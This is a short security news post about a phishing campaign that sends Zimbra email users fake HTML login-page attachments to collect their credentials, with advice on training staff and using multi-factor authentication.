News

A mass-spreading social engineering campaign has been discovered, targeting users of the Zimbra Collaboration email server. The campaign aims to collect login credentials and is active since April 2023. It primarily targets small and medium businesses and government entities in Poland, Ecuador, Mexico, Italy, and Russia. The threat actor or group behind the campaign has not been identified.

The attack begins with a phishing email containing an attached HTML file. The email warns the recipient about an email server update or account deactivation, and instructs them to open the attached file. The email is designed to appear as if it is coming from a Zimbra administrator, increasing the chances of the recipient opening the attachment.

The HTML file contains a Zimbra login page that is customized to match the targeted organization. The victim’s email address is pre-filled in the Username field to make the page seem more authentic. When the victim enters their credentials, the information is collected through an HTML form and sent to an actor-controlled server via a HTTPS POST request.

What sets this campaign apart is its ability to propagate further. Subsequent waves of phishing attacks have leveraged accounts from previously targeted companies. It is believed that the infiltrated administrator accounts were used to send emails to other entities of interest. This suggests that the attacker relies on password reuse by targeted administrators.

Although the campaign is not highly sophisticated, it takes advantage of the fact that HTML attachments contain legitimate code. The only suspicious element is a link embedded in the source code, which leads to the malicious host. This makes it easier for the emails to bypass reputation-based anti-spam policies compared to traditional phishing techniques.

Organizations using the Zimbra Collaboration email server should be vigilant and educate their employees about the risks of phishing attacks. Implementing multi-factor authentication and regularly updating security patches can help mitigate the risks associated with such campaigns.

The post New Mass-Spreading Social Engineering Campaign Targets Zimbra Collaboration Email Server Users appeared first on satProviders.